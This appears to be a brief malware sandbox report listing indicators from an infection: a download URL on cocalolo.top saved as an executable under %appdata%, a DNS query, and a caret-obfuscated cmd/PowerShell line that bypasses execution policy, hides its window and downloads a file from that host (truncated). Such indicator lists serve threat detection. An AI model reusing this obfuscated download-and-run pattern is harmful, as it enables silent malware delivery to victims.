Technical Information
- http://cocalolo.top/search.php as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OWErSH^el^l^.EXe -Ex^ECut^ionp^O^l^I^cy bY^P^A^s^S -^nOP^r^OFILE^ -WiNDowStyL^e HidDen^ ^(^new-ob^JeC^T^ S^Ys^tE^m.^N^ET^.W^EB^CL^IEnT^).Do^w^nLO^ADfilE('http://cocalol...
- DNS ASK co###olo.top
- '<SYSTEM32>\cmd.exe' /C "P^OWErSH^el^l^.EXe -Ex^ECut^ionp^O^l^I^cy bY^P^A^s^S -^nOP^r^OFILE^ -WiNDowStyL^e HidDen^ ^(^new-ob^JeC^T^ S^Ys^tE^m.^N^ET^.W^EB^CL^IEnT^).Do^w^nLO^ADfilE('http://cocalol...' (with hidden window)